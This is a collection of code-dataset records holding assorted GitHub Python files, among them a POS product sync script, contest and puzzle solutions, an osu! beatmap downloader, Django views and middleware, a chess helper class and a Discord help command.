'%Y-%m-%d %H:%M:%S') \n\n for colN in colNames:\n\n if colN!=\"IdProducto\":\n\n if primero==False:\n updateSQL = (updateSQL + \",\")\n insertSQL = (insertSQL + \",\")\n insertVSQL = (insertVSQL + \",\")\n\n primero=False\n\n updateSQL = updateSQL + colN + \" = %s\"\n insertSQL = insertSQL + colN\n insertVSQL = insertVSQL + \"%s\"\n \n value = producto[colN]\n if str(type(value))==\"\":\n prodData.append(value.encode('ascii', 'ignore').decode('ascii'))\n else:\n prodData.append(value)\n\n idProdArr = obtenerIdLocal(producto[\"IdProducto\"])\n if len(idProdArr) > 0:\n print(\"Actualizar {0}...\".format(idProdArr[0]))\n fp.write(\"Actualizar {0}...\\n\".format(idProdArr[0]))\n prodData.append(idProdArr[0])\n updateSQL = updateSQL + \" where idProducto = %s;\"\n #print(updateSQL)\n if actualizarRegistro(updateSQL, prodData) < 1:\n print(\"No se actualizo\")\n fp.write(\"No se actualizo\\n\")\n #wentOK=False\n else:\n print(\"Insertar {0}...\".format(producto[\"IdProducto\"]))\n fp.write(\"Insertar {0}...\\n\".format(producto[\"IdProducto\"]))\n insertSQL = insertSQL + \") \" + insertVSQL + \");\";\n #print(insertSQL)\n nuevoId=insertarRegistro(insertSQL, prodData)\n insertNubeRef=\"insert into catArticulosNube(idNube, idLocal, dtFechaAct, dtFechaDownload) values(%s, %s, NOW(), NOW());\";\n paramsNube = []\n paramsNube.append(producto[\"IdProducto\"]) \n paramsNube.append(nuevoId)\n fp.write(\"nuevo id {0}\".format(nuevoId))\n print(\"nuevo id {0}\\n\".format(nuevoId))\n if actualizarRegistro(insertNubeRef, paramsNube) < 1:\n print(\"No se inserto\")\n fp.write(\"No se inserto\\n\")\n wentOK=False\n\n if wentOK == True:\n print(\"Actualuzacion completada exitosamene...\")\n fp.write(\"Actualizacion completada exitosamente\\n\")\n if totalReg > 0:\n print(dtRegModificado)\n resultEnd=requests.get('http://45.55.248.209:5002/productos/actualizacion/{0}/{1}'.format(idTienda,dtRegModificado))\n print('http://45.55.248.209:5002/productos/actualizacion/{0}/{1}'.format(idTienda,dtRegModificado))\n print(resultEnd)\n else:\n print(\"Actualuzacion completada con errores...\")\n fp.write(\"Actualizacion completada con errores\\n\")\n\n fp.close()\n","repo_name":"miguel-mota-gonzalez/ipcPOS","sub_path":"actualizarProductos.py","file_name":"actualizarProductos.py","file_ext":"py","file_size_in_byte":5998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34076063476","text":"\r\nd = int(input())\r\nhouses = [[i[0], int(i[1:])] for i in input().split(', ')[1:]]\r\nodd = [i for i in houses if i[1] % 2]\r\neven = [i for i in houses if i[1] % 2 == 0]\r\n\r\nfor delivery in range(d):\r\n inp = input().split(', ')[1:]\r\n odd += [[i[0], int(i[1:])] for i in inp[:-2] if int(i[1:]) % 2]\r\n odd.sort()\r\n even += [[i[0], int(i[1:])] for i in inp[:-2] if int(i[1:]) % 2 == 0]\r\n even.sort()\r\n if int(inp[-1]) <= len(odd):\r\n for i in range(len(odd)):\r\n if ord(odd[i][0]) >= ord(inp[-2]):\r\n print(''.join([str(i) for i in odd[(i + int(inp[-1]) - 1) % len(odd)]]))\r\n break\r\n else:\r\n for i in range(len(even)):\r\n if ord(even[i][0]) >= ord(inp[-2]):\r\n print(''.join([str(i) for i in even[(i + int(inp[-1]) - 1 - len(odd)) % len(even)]]))\r\n break\r\n","repo_name":"dolphin2025/ACSL","sub_path":"Other/Mail Delivery.py","file_name":"Mail Delivery.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7072619468","text":"# Count the one and three chain links\n\nimport re\nimport pprint\n\npp = pprint.PrettyPrinter(indent=4)\n\nwith open('input1.txt', 'r') as input:\n instructions = [line.strip() for line in input.readlines()]\n\nfield_pattern = r'''(.*): (\\d*)-(\\d*) or (\\d*)-(\\d*)'''\nfield_rules = {}\nindex = 0\n\n# Fields\nwhile instructions[index] != '':\n rule = re.match(field_pattern, instructions[index]).groups()\n\n field = rule[0]\n\n min1 = int(rule[1])\n max1 = int(rule[2])\n\n min2 = int(rule[3])\n max2 = int(rule[4])\n\n field_rules[field] = {\n 'min1': min1,\n 'max1': max1,\n 'min2': min2,\n 'max2': max2\n }\n\n index += 1\n\nprint('MIN MAXES:')\nprint(field_rules)\n\n# My Ticket\nindex += 2\nmy_ticket = instructions[index].split(',')\nprint(my_ticket)\n\nindex += 3\n\ninvalid_nums = []\ninvalid_indices = [39, 42, 46, 48, 49, 53, 61, 63, 64, 65, 69, 74, 77, 80, 94, 98, 102, 103, 106, 117, 120, 129, 130, 133, 140, 142, 147, 150, 151, 152, 153, 155, 158, 159, 161, 164, 169, 182, 190, 199, 201, 210, 213, 222, 224, 225, 228, 236, 245, 251, 252, 253, 257, 258, 269]\n# invalid_indices = [9,10,11]\n\nnum_fields = len(field_rules)\nfield_validity = {}\nfor field_name in field_rules:\n field_validity[field_name] = list(range(num_fields))\nprint(field_validity)\n\n\n\ndef check_num(num, rules):\n if rules['min1'] <= num <= rules['max1']:\n return True\n if rules['min2'] <= num <= rules['max2']:\n return True\n return False\n\n# Nearby Tickets\nwhile index < len(instructions):\n if index in invalid_indices:\n index += 1\n continue\n\n nums = instructions[index].split(',')\n for field_index, num in enumerate(nums):\n for field, validities in field_validity.items():\n if field_index in validities:\n if not check_num(int(num), field_rules[field]):\n field_validity[field].remove(field_index)\n index+=1\n\nupdated = True\ndone = {}\nwhile updated == True:\n updated = False\n for field, validities in field_validity.items():\n for num in done:\n if num in validities:\n updated = True\n validities.remove(num)\n if len(validities) == 1:\n done[validities[0]] = field\n updated = True\n\nprint(done)\n\nproduct = 1\nfor index, field in done.items():\n if field.startswith('departure'):\n product *= int(my_ticket[index])\n\nprint(product)","repo_name":"casivido/advent_2020","sub_path":"day16/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":2406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25686260206","text":"from datetime import datetime, date\nfrom util.tools import format_entity, format_param, format_param_list\nfrom helpers.firestore import FirestoreHelper\nfrom model.kb.inference_engine import rank_content, explain_instance\n\n\"\"\" Multi-task recommender system.\n - Learning-object suggestion:\n . Course\n . Article\n\"\"\"\n\ndef teacher_constraint(course_ref, req_teachers):\n \"\"\" Check if at least one of course teachers is also\n present on the teachers requested by the user.\n \"\"\"\n course_teachers = course_ref._data['docentes']\n for course_teacher in course_teachers:\n if course_teacher in req_teachers:\n return True\n\n return False\n\ndef class_datetime_constraint(course_ref, weekdays, start_time, end_time, da_helper):\n \"\"\" Check if at least one of the course \n classes is in a feasible weekday and\n time interval.\n \"\"\"\n\n class_helper = FirestoreHelper(course_ref.reference)\n classes = class_helper.get_collection('oferecimentos', ref=True)\n\n for class_ref in classes:\n for day in weekdays:\n schedule_helper = FirestoreHelper(class_ref.reference)\n filter_schedule = [\n ['dia', '==', '{}'.format(day)], # weekdays[0]\n ]\n schedules = schedule_helper.query('horarios', filter_schedule)\n\n for schedule in schedules:\n # no constraint on time\n if not start_time and not end_time:\n return True\n # check if class meet schedule requirements\n if datetime.strptime(schedule['horario_fim'], \"%H:%M\") <= datetime.strptime(end_time, \"%H:%M\") and datetime.strptime(schedule['horario_inicio'], \"%H:%M\") >= datetime.strptime(start_time, \"%H:%M\"):\n return True\n \n return False\n\ndef get_explanation(params, db, context):\n theme_raw = context[0]['parameters']['theme']\n theme = format_entity(theme_raw)\n\n course = params['Course'].lower()\n\n reasons = explain_instance(course, 'subject', theme)\n\n return 'Recomendo a disciplina {}, pois {}'.format(course, ', '.join(reasons[:3]))\n\ndef get_course_recommendation(params, db):\n\n theme_raw = params['theme']\n theme = format_entity(theme_raw)\n \n k = int(params['suggestion_number']) # nº recommendations\n\n teachers = format_param_list(params['teachers'])\n weekdays = format_param_list(params['weekdays'])\n start_time = None\n end_time = None\n if format_param(params['time_period']):\n start_time = params['time_period']['startTime'][11:-9]\n end_time = params['time_period']['endTime'][11:-9]\n\n courses = rank_content(theme) # KGE link prediction \n\n da_helper = FirestoreHelper(db) # data access helper\n\n recommendations = []\n for course_id in courses[:10]: # Reduce search space\n # stop if enough recommendations have been found\n if len(recommendations) == k:\n break\n\n course_ref = da_helper.get_document('cursos', course_id, ref=True)\n\n # meet teacher requirement\n if len(teachers) > 0 and not teacher_constraint(course_ref, teachers):\n continue\n\n # meet date and time requirements\n if len(weekdays) > 0 and not class_datetime_constraint(course_ref, weekdays, start_time, end_time, da_helper):\n continue\n\n recommendations.append(course_id + ' - ' + course_ref._data['name'])\n\n if len(recommendations) > 1:\n return 'Recomendo as disciplinas: {}'.format(', '.join(recommendations))\n elif len(recommendations) == 1:\n return 'Recomendo a disciplina: {}'.format(', '.join(recommendations))\n else:\n return 'Desculpe, não encontrei disciplinas que atendam as requisitos levantados :('\n\ndef get_article_recommendation(params, db):\n \n return 'get_article_recommendation'\n","repo_name":"gustapp/ganimedes-chatbot","sub_path":"functions/src/handlers/recommender.py","file_name":"recommender.py","file_ext":"py","file_size_in_byte":3835,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"797172397","text":"# http://punter.inf.ed.ac.uk/maps/sample.json\n\nimport sys\nfrom html.parser import HTMLParser\n\npaths = set()\nfor line in sys.stdin.readlines():\n begin = line.find(\"?map=/map\")\n if begin != -1:\n end = line[begin:].find('.json')\n if end != -1:\n path = \"http://punter.inf.ed.ac.uk\" + line[begin+5:begin+end] + \".json\"\n paths.add(path)\n\nfor path in paths:\n print(path)\n","repo_name":"hasipon/icfpc2017","sub_path":"maps/parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29017443160","text":"from fonctions import afficher\n\nfichier = None\n\n'''\nOuvre le fichier spécifié en paramètres. S'il existe, il sera écrasé, autrement, il sera créé.\n@param cheminFichier Le chemin absolu vers le fichier à ouvrir. Ex: \"/home/user/fichier.xml\"\n'''\ndef ouvrirFichier(cheminFichier):\n global fichier\n try:\n fichier = open(cheminFichier, \"w\")\n fichier.write(\"\\n\")\n except IOError as ex:\n print(\"Erreur lors de l'ouverture du fichier :\\n\" + ex.value)\n exit(1)\n \ndef fermerFichier():\n global fichier\n fichier.write(\"\")\n fichier.close()\n \n'''\nAjoute les balises xml permettant d'afficher l'image\n@param nomImage Le nom de l'image à ajouter\n@param cheminImages Le chemin du dossier contenant les images\n@param duree La duree d'affichage de l'image lors du diaporama\n'''\ndef ajouterImage(nomImage, cheminImages, duree):\n global fichier\n fichier.write(\" \\n\")\n fichier.write(\" \" + duree + \"\\n\")\n fichier.write(\" \" + cheminImages + \"/\" + nomImage + \"\\n\")\n fichier.write(\" \\n\")\n afficher(\"Image '\" + nomImage + \"' ajoutée\")","repo_name":"Takiguchi72/GenerateurDiaporamaXml","sub_path":"gestionFichier.py","file_name":"gestionFichier.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16390914097","text":"from email.mime import application\nimport sys\nfrom PySide6 import QtCore, QtGui, QtWidgets\nfrom PySide6.QtGui import QIcon\nfrom PySide6.QtWidgets import QMainWindow\nfrom PySide6.QtWidgets import QWidget\nfrom PySide6.QtWidgets import QFileDialog\nfrom PySide6.QtWidgets import QMessageBox\nfrom ui import Ui_MainWindow\nfrom controller import *\n\nclass Parser(QtWidgets.QMainWindow):\n def __init__(self):\n super(Parser, self).__init__()\n self.ui = Ui_MainWindow()\n self.ui.setupUi(self)\n self.init_UI()\n self.directory = \"\"\n \n def init_UI(self):\n self.setWindowTitle(\"Osu collector parser\")\n \n self.ui.lineEdit.setPlaceholderText('collection url')\n self.ui.pushButton.clicked.connect(self.download_beatmaps)\n self.ui.pushButton_2.clicked.connect(self.get_save_path)\n \n def get_save_path(self):\n self.directory = str(QFileDialog.getExistingDirectory(self, \"Select Directory\"))\n _translate = QtCore.QCoreApplication.translate\n self.ui.label.setText(_translate(\"MainWindow\", self.directory))\n \n def download_beatmaps(self):\n url = self.ui.lineEdit.text()\n if url != \"\" and self.directory != \"\":\n parse_url_song(url, self.directory+\"/\")\n msg = QMessageBox()\n msg.setText(\"Download is ended!\")\n msg.setWindowTitle(\"Info\")\n msg.setWindowIcon(QtGui.QIcon(\"white tic.png\"))\n msg.setIcon(QMessageBox.Information)\n msg.setStyleSheet(\"background-color: rgb(255, 255, 255);\")\n msg.setStyleSheet(\"color: rgb(0, 0, 0);\")\n msg.exec_()\n else:\n msg = QMessageBox()\n msg.setText(\"Please set correct url or directory path\")\n msg.setWindowTitle(\"Warning\")\n msg.setWindowIcon(QtGui.QIcon(\"white tic.png\"))\n msg.setIcon(QMessageBox.Information)\n msg.setStyleSheet(\"background-color: rgb(255, 255, 255);\")\n msg.setStyleSheet(\"color: rgb(0, 0, 0);\")\n msg.exec_()\n #QMessageBox.about(self, \"Warning\", \"Please set correct url or directory path!\")\n \n\nif __name__ == '__main__':\n app = QtWidgets.QApplication([])\n application = Parser()\n application.show()\n sys.exit(app.exec())","repo_name":"Millrocious/Osu-Collector-Downloader","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2398585884","text":"from typing import List\n\n\nclass Solution:\n def missingNumber(self, nums: List[int]) -> int:\n length = len(nums)\n sumOfLen = length*(length+1)//2\n sumOfList = sum(nums)\n ans = sumOfLen - sumOfList\n ans if ans else max(nums) + 1\n return ans\n\n\nobj = Solution()\nprint(f'{obj.missingNumber([9,6,4,2,3,5,7,0,1])}')\n","repo_name":"souradeepta/leetcode-practice","sub_path":"python/268-Missing-Number.py","file_name":"268-Missing-Number.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"9415415786","text":"from pyroute2.netlink import nla\n\nflags = {'reorder_hdr': 0x1, 'gvrp': 0x2, 'loose_binding': 0x4, 'mvrp': 0x8}\n\n\nclass vlan(nla):\n prefix = 'IFLA_'\n\n nla_map = (\n ('IFLA_VLAN_UNSPEC', 'none'),\n ('IFLA_VLAN_ID', 'uint16'),\n ('IFLA_VLAN_FLAGS', 'vlan_flags'),\n ('IFLA_VLAN_EGRESS_QOS', 'qos'),\n ('IFLA_VLAN_INGRESS_QOS', 'qos'),\n ('IFLA_VLAN_PROTOCOL', 'be16'),\n )\n\n class vlan_flags(nla):\n fields = (('flags', 'I'), ('mask', 'I'))\n\n class qos(nla):\n prefix = 'IFLA_'\n\n nla_map = (\n ('IFLA_VLAN_QOS_UNSPEC', 'none'),\n ('IFLA_VLAN_QOS_MAPPING', 'qos_mapping'),\n )\n\n class qos_mapping(nla):\n fields = (('from', 'I'), ('to', 'I'))\n","repo_name":"svinota/pyroute2","sub_path":"pyroute2/netlink/rtnl/ifinfmsg/plugins/vlan.py","file_name":"vlan.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","stars":888,"dataset":"github-code","pt":"61"} +{"seq_id":"32343006704","text":"from django.http import HttpResponseRedirect\nfrom django.conf import settings\nfrom models import FormBuilderPreference\n\nclass OtherFormBuilderRedirectMiddleware(object):\n '''\n If the user prefers to use another form builder, redirect to it\n '''\n THIS_BUILDER = FormBuilderPreference.DKOBO\n PREFERENCE_TO_PREFIX = {\n FormBuilderPreference.KPI: settings.KPI_PREFIX,\n FormBuilderPreference.DKOBO: settings.DKOBO_PREFIX,\n }\n\n def _redirect_if_necessary(self, request, preferred_builder):\n preferred_builder_key = preferred_builder.preferred_builder\n preferred_prefix = self.PREFERENCE_TO_PREFIX[preferred_builder_key]\n prefix_length = max(1, len(request.path) - len(request.path_info))\n prefix = request.path[:prefix_length]\n if prefix != preferred_prefix:\n try:\n # Requires Django 1.7\n scheme = request.scheme\n except:\n scheme = 'https' if request.is_secure() else 'http'\n return HttpResponseRedirect(u'{}://{}{}'.format(\n scheme, request.get_host(), preferred_prefix))\n\n def process_view(self, request, view_func, view_args, view_kwargs):\n ''' Using process_view instead of process_request allows the resolver\n to run and return 404 when appropriate, instead of blindly returning\n 302 for all requests '''\n if request.path_info.startswith('/admin/'):\n # Never redirect the admin interface\n return\n preferred_builder = self.THIS_BUILDER\n if not settings.KPI_PREFIX or not settings.DKOBO_PREFIX \\\n or request.user.is_anonymous():\n # Do not attempt to redirect if the necessary prefixes are not\n # configured or the user is anonymous\n return\n (preferred_builder, created) = \\\n FormBuilderPreference.objects.get_or_create(user=request.user)\n return self._redirect_if_necessary(request, preferred_builder)\n","repo_name":"kobotoolbox/dkobo","sub_path":"dkobo/hub/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":2002,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"61"} +{"seq_id":"28212237455","text":"\n\n# Useful functions class (contains as many generic functions as possible -> used in many classes)\nclass Tools(object):\n\n # region Methods\n @staticmethod\n def not_out_of_borders(row, col):\n if row < 8 and row >= 0 and col < 8 and col >= 0:\n return True\n return False\n\n @ staticmethod\n def check_lines(board, row, col, x, y, moves, amount=2, turn=1):\n\n for i in range(1, amount):\n\n if Tools.not_out_of_borders(row + x * i, col + y * i):\n if board[row + x * i][col + y * i] == 0:\n moves.append([row + x * i, col + y * i])\n elif turn == 1 and board[row + x * i][col + y * i] < 0:\n moves.append([row + x * i, col + y * i])\n break\n elif turn == 0 and board[row + x * i][col + y * i] > 0:\n moves.append([row + x * i, col + y * i])\n break\n else:\n break\n else:\n break\n\n @staticmethod\n def all_soldiers_moves(turn, model, board):\n\n soldier_places = []\n soldier_moves = []\n\n # Find all the soldiers on the board and their moves\n\n # black side\n if turn == 0:\n\n # Find soldiers\n\n for i in range(len(board)):\n for j in range(len(board[i])):\n if board[i][j] < 0:\n soldier_places.append([i, j])\n\n # Find moves\n\n for i in range(len(soldier_places)):\n temp = model.onaction(soldier_places[i][0], soldier_places[i][1], 0, -1, -1, 0)\n soldier_moves.append(temp)\n\n # white side\n else:\n\n for i in range(len(board)):\n for j in range(len(board[i])):\n if board[i][j] > 0:\n soldier_places.append([i, j])\n\n for i in range(len(soldier_places)):\n temp = model.onaction(soldier_places[i][0], soldier_places[i][1], 0)\n soldier_moves.append(temp)\n\n return soldier_places, soldier_moves\n\n @ staticmethod\n def create_dummy_board(board):\n\n dummy_board = []\n\n for i in range(len(board)):\n\n temp_list = []\n\n for j in range(len(board[i])):\n temp_list.append(board[i][j])\n\n dummy_board.append(temp_list)\n\n return dummy_board\n\n # Print the board\n @staticmethod\n def print_board(board):\n\n for i in board:\n\n print(i)\n\n @staticmethod\n def convert_to_one_dimensional_lists(old_list_places, old_list_moves):\n\n one_d_list_move = []\n one_d_list_places = []\n\n\n for i in range(len(old_list_moves)):\n\n if type(old_list_moves[i]) == list:\n for j in old_list_moves[i]:\n\n one_d_list_move.append(j)\n one_d_list_places.append(old_list_places[i])\n\n return one_d_list_places, one_d_list_move\n\n @staticmethod\n def find_amount_of_soldiers(board):\n\n sum_soldiers = 0\n\n for i in range(8):\n for j in range(8):\n if board[i][j] != 0:\n sum_soldiers += 1\n\n return sum_soldiers\n\n @staticmethod\n def reverse_2d_list(input_list):\n\n # reverese items inside list\n input_list.reverse()\n\n # reverse each item inside the list using map function(Better than doing loops...)\n input_list = list(map(lambda x: x[::-1], input_list))\n\n # return\n return input_list\n # endregion","repo_name":"aloni34/Python_Game_Chess_MiniMax","sub_path":"Chess/Utilities/Tools.py","file_name":"Tools.py","file_ext":"py","file_size_in_byte":3581,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"73842237954","text":"import re\n\ndef add(numbers_string):\n if len(numbers_string)>0:\n # delimiter declaration regex pattern\n dd_pattern = r'//(?P.*)\\n(?P.*)'\n # check if delimiter is declared\n dd_match = re.match(dd_pattern, numbers_string)\n if dd_match:\n # delmiter declaration group dictionary\n dd_dict = dd_match.groupdict()\n delimiters = [dd_dict['delimiter']]\n numbers_string = dd_dict['numbers_string']\n else:\n # list of delimiters\n delimiters = [',', '\\n']\n # delimiter regex of splitting for regex based splitting\n delimiters_regex = '|'.join(map(re.escape, delimiters))\n def neg_except(numbers):\n \"\"\"Raise exception when a number in numbers in negative\"\"\"\n numbers = list(numbers)\n neg_numbers = list(filter(lambda x: x<0, numbers))\n if len(neg_numbers)>0:\n raise(Exception('negatives not allowed ['+','.join(neg_numbers)+']'))\n return numbers\n # list of numbers in the given string\n numbers = map(int, re.split(delimiters_regex, numbers_string))\n # check none of the numbers is negative\n numbers = neg_except(numbers)\n return sum(numbers)\n else:\n return 0\n","repo_name":"starkhv/tdd_kata","sub_path":"day4/string_calculator.py","file_name":"string_calculator.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"332004018","text":"import os\nimport shutil\nimport pathlib\nimport subprocess\n\nimport mysql.connector\n\nfrom contextlib import contextmanager\n\n\nclass LoadDataInFile():\n\n CNF_PRIORITY = \"priority\"\n CNF_REPLACEMENT = \"replacement\"\n CNF_CHARSET = \"charset\"\n CNF_FIELDS_TERMINATED_BY = \"fields_terminated_by\"\n CNF_FIELDS_ENCLOSED_BY = \"fields_enclosed_by\"\n CNF_FIELDS_ESCAPED_BY = \"fields_escaped_by\"\n CNF_LINES_TERMINATED_BY = \"lines_terminated_by\"\n CNF_LINES_STARTING_BY = \"lines_starting_by\"\n CNF_IGNORE_LINES = \"ignore_lines\"\n CNF_COLUMNS = \"columns\"\n CNF_SET = \"set\"\n\n def __init__(self, cache_dir, database, table, config):\n self._cache_dir = cache_dir\n self._database = database\n self._table = table\n self._config = config\n\n @classmethod\n @contextmanager\n def context(cls, **args):\n try:\n cnx = mysql.connector.connect(**args)\n yield cnx\n finally:\n cnx.disconnect()\n\n def run(self, file, ctx_obj):\n conn = ctx_obj\n stmt = self._generate(file.filepath)\n result = conn.cmd_query(stmt)\n return result\n\n def _generate(self, filepath):\n prepared_stmt = \"\"\"\n LOAD DATA {PRIORITY} LOCAL INFILE \\\"{FILE}\\\"\n {REPLACEMENT}\n INTO TABLE {TABLE}\n CHARACTER SET {CHARSET}\n FIELDS\n TERMINATED BY {COLUMNS_TERMINATED_BY}\n ENCLOSED BY {COLUMNS_ENCLOSED_BY}\n ESCAPED BY {COLUMNS_ESCAPED_BY}\n LINES\n STARTING BY {LINES_STARTING_BY}\n TERMINATED BY {LINES_TERMINATED_BY}\n IGNORE {IGNORE_LINES} ROWS\n ({COLUMNS})\n SET {SET}\n \"\"\"\n\n stmt = prepared_stmt.format(\n FILE=filepath,\n PRIORITY=self._config[LoadDataInFile.CNF_PRIORITY],\n TABLE=self._table,\n REPLACEMENT=self._config[LoadDataInFile.CNF_REPLACEMENT],\n CHARSET=self._config[LoadDataInFile.CNF_CHARSET],\n COLUMNS_TERMINATED_BY=self._config[LoadDataInFile.CNF_FIELDS_TERMINATED_BY],\n COLUMNS_ENCLOSED_BY=self._config[LoadDataInFile.CNF_FIELDS_ENCLOSED_BY],\n COLUMNS_ESCAPED_BY=self._config[LoadDataInFile.CNF_FIELDS_ESCAPED_BY],\n LINES_STARTING_BY=self._config[LoadDataInFile.CNF_LINES_STARTING_BY],\n LINES_TERMINATED_BY=self._config[LoadDataInFile.CNF_LINES_TERMINATED_BY],\n IGNORE_LINES=self._config[LoadDataInFile.CNF_IGNORE_LINES],\n COLUMNS=self._config[LoadDataInFile.CNF_COLUMNS],\n SET=self._config[LoadDataInFile.CNF_SET]\n )\n\n return stmt\n\n\nclass ImportCommand():\n\n def __init__(self, command, cache_dir, database, table, config):\n self._cmd = command\n self._cache_dir = cache_dir\n self._database = database\n self._table = table\n self._config = config\n\n @contextmanager\n @classmethod\n def context(cls, **args):\n yield None\n\n def run(self, file):\n tmp_filename = '%s.%s' % (self._table, file.filename)\n tmp_filepath = str(pathlib.PurePath(os.getcwd(),\n self._cache_dir,\n tmp_filename))\n\n shutil.copy(file.filepath, tmp_filepath)\n\n cmd = [\n self._cmd,\n '--local',\n '--replace'\n ]\n\n for item in self._config:\n cmd.append('--%s=%s' % (item, self._config[item]))\n\n cmd.append(self._database)\n cmd.append(tmp_filepath)\n\n p = subprocess.run(cmd)\n\n return p.returncode\n","repo_name":"GoPlan/pymysqlbatchimport","sub_path":"mysqlimport.py","file_name":"mysqlimport.py","file_ext":"py","file_size_in_byte":3644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70489384196","text":"from math import ceil\nfrom math import log\n\ndef binary_search(A, low, high, k):\n if high >= low:\n mid = (low + high) // 2\n print(mid)\n if A[mid] is None:\n return binary_search(A, low, mid-1, k)\n if k == A[mid][0]:\n return True, mid\n elif k < A[mid][0]:\n return binary_search(A, low, mid-1, k)\n else:\n return binary_search(A, mid+1, high, k)\n else:\n return False, high, low\n\ndef zad6(A):\n n = len(A)\n B = [None for _ in range(ceil(log(n, 2)))]\n for i in range(n):\n x = binary_search(B, 0, ceil(log(n, 2))-1, A[i])\n if x[0]:\n B[x[1]][1] += 1\n else:\n if B[x[2]] is not None:\n cnt = x[2]\n save = [A[i], 1]\n while cnt < ceil(log(n, 2))-1 and B[cnt] is not None:\n save, B[cnt] = B[cnt+1], save\n cnt += 1\n else:\n B[x[2]] = [A[i], 1]\n i = j = 0\n while i < n:\n A[i] = B[j][0]\n B[j][1] -= 1\n if B[j][1] == 0:\n j += 1\n i += 1\n\nif __name__ == '__main__':\n tab = [1, 2, 3, 4, 1, 2, 3, 5, 1, 1, 1, 2, 3, 5, 5, 3, 3, 2, 1, 1, 4]\n zad6(tab)\n print(tab)\n\n\n","repo_name":"Deevo87/asd-algorithms","sub_path":"sorting/bit_algo_sorting/1.zadanie6.py","file_name":"1.zadanie6.py","file_ext":"py","file_size_in_byte":1254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1337232808","text":"from django.shortcuts import render\nfrom .models import Seller, Country\nfrom django.http import HttpResponse, HttpResponseRedirect, Http404\nfrom .forms import SellerForm, MatchForm\n\ndef home(request):\n sellers_in_egypt = Seller.objects.filter(country_name='Egypt')\n return render(request, 'home.html', {'sellers_in_egypt': sellers_in_egypt})\n\n### THIS IS SOLELY FOR MILESTONE 2 PROGRESS REPORT\ndef test(request):\n sellers_in_egypt = Seller.objects.filter(country_name='Egypt')\n return render(request, 'test.html', {'sellers_in_egypt': sellers_in_egypt})\n###\n\ndef matchmaker(request):\n\tprices, countries, sortBy = [], [], []\n\tif request.method == 'POST':\n\t\tinfo = MatchForm(request.POST)\n\n\t\tif info.is_valid():\n\t\t\tinfo = info.clean_match_form()\n\t\t\tprices = [info['minPrice'], info['maxPrice']]\n\t\t\tcountries = info['countries']\n\t\t\tsortBy = info['sortBy']\n\t\t\tinfo = MatchForm()\n\telse: \n\t\tinfo = MatchForm()\n\n\t# for before the form is submitted\n\tif len(prices) > 0:\n\t\ttable = Seller.objects.filter(price_per_kwh__gte=prices[0], price_per_kwh__lte=prices[1])\n\telse: table = Seller.objects.all()\n\n\tif len(countries) > 0:\n\t\ttable = table.filter(country_name__in=countries)\n\n\tif len(sortBy) == 1:\n\t\t\ttable = table.order_by(sortBy[0])\n\tif len(sortBy) == 2:\n\t\ttable = table.order_by(sortBy[0], sortBy[1])\n\n\treturn render(request, 'matchmaker.html', {'matches': table, 'info': info})\n\ndef newseller(request):\n\tif request.method == 'POST':\n\t\tform = SellerForm(request.POST)\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t\treturn HttpResponseRedirect('/newseller/thankyou/')\n\telse:\n\t\tform = SellerForm()\n\treturn render(request, 'newseller.html', {'form': form})\n\ndef thankyou(request):\n\treturn render(request, 'thankyou.html')\n \ndef countries(request):\n\t\n\thasSeller = []\n\tfor c in Country.objects.all():\n\t\tif (c==s.country_name for s in Seller.objects.all()):\n\t\t\thasSeller.append('yes')\n\t\telse:\n\t\t\thasSeller.append('no')\n\tmyList= zip(Country.objects.values_list('name'), Country.objects.values_list('percent_pop_needs_elec'), hasSeller)\n\treturn render(request, 'countries.html', {'myList': myList})\n\n\n\n \n","repo_name":"justinchristopherperry/projectEnergy","sub_path":"matchmaker/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8261911508","text":"from discord.ext import commands\nimport discord\nimport asyncio\n\n# shamelessly stolen from https://github.com/Gobot1234/Light-Bot/blob/d6891814f3b75604ff009a3db200c095c159810b/Cogs/help.py#L173\n\n\nclass HelpCommand(commands.HelpCommand):\n def __init__(self):\n super().__init__(command_attrs={\"help\": \"Shows help about the bot, a command, or a cog\"})\n\n def get_command_signature(self, command):\n return \"{0.clean_prefix}{1.qualified_name} {1.signature}\".format(self, command)\n\n async def send_bot_help(self, mapping):\n ctx = self.context\n bot = ctx.bot\n page = -1\n cogs = [name for name, obj in bot.cogs.items() if await discord.utils.maybe_coroutine(obj.cog_check, ctx)\n and name not in (\"owner\", \"CommandErrorHandler\")]\n cogs.sort()\n\n def check(reaction, user):\n return user == ctx.author and help_embed.id == reaction.message.id\n\n embed = await self.bot_help_paginator(page, cogs)\n help_embed = await ctx.send(embed=embed)\n bot.loop.create_task(self.bot_help_paginator_reactor(help_embed))\n\n while 